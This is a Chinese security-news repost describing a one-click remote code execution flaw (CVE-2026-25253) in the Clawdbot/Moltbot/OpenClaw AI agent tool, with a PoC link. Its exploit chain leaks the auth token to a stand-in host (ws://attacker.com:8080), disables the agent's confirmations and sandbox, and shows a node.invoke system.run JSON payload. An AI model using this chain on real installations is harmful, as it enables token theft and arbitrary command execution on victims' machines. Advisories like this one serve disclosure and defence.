文章总结： 该文档披露了Clawdbot/Moltbot/OpenClaw中的一键远程代码执行漏洞CVE-2026-25253。攻击者诱导受害者访问恶意网站后，利用客户端JavaScript窃取认证令牌并连接本地WebSocket服务，随后禁用安全沙箱与确认机制，通过node.invoke接口执行任意系统命令。文档提供了完整的漏洞利用链分析、PoC代码链接及详细的技术文章参考，具有较高安全价值。 综合评分： 78 文章分类： 漏洞POC,漏洞分析,漏洞预警

Clawdbot/Moltbot/OpenClaw 一键远程代码执行 PoC 🦞 (CVE-2026-25253)

Ots安全

2026年3月13日 13:41 广东

威胁简报

恶意软件

漏洞攻击

完整的一键远程代码执行漏洞利用链

1. 受害者访问attacker.com（实际上是一个不起眼的网址）
2. 客户端 JavaScript 代码attacker.com在受害浏览器上执行，打开一个后台窗口http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080。这会将身份验证令牌发送到目标服务器。attacker.com:8080
3. attacker.com受害者浏览器上执行的客户端 JavaScript 代码会创建一个 WebSocket 连接ws://localhost:18789（默认的 OpenClaw 服务器配置），并使用窃取的令牌进行身份验证。然后，它会向以下 API 发送请求：

• 禁用危险命令的用户确认
• 禁用所有沙盒

最后，为了实现任意命令执行，攻击者的 JavaScript 代码会执行以下node.invoke请求：

{     "type": "req",     "id": "4",     "method": "node.invoke",     "params": {          "nodeId": "main",          "command": "system.run",          "params": {               "cmd": "bash -c 'echo hacked > /tmp/hacked'"          },          "timeoutMs": 60000,          "idempotencyKey": "rev1"     }}

POC：

https://github.com/ethiack/moltbot-1click-rce

文章分析：

https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys

END

公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址

排版 编辑 | Ots 小安

采集 翻译 | Ots Ai牛马

公众号 | AnQuan7 (Ots安全)

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Ots安全 《Clawdbot/Moltbot/OpenClaw 一键远程代码执行 PoC 🦞 (CVE-2026-25253)》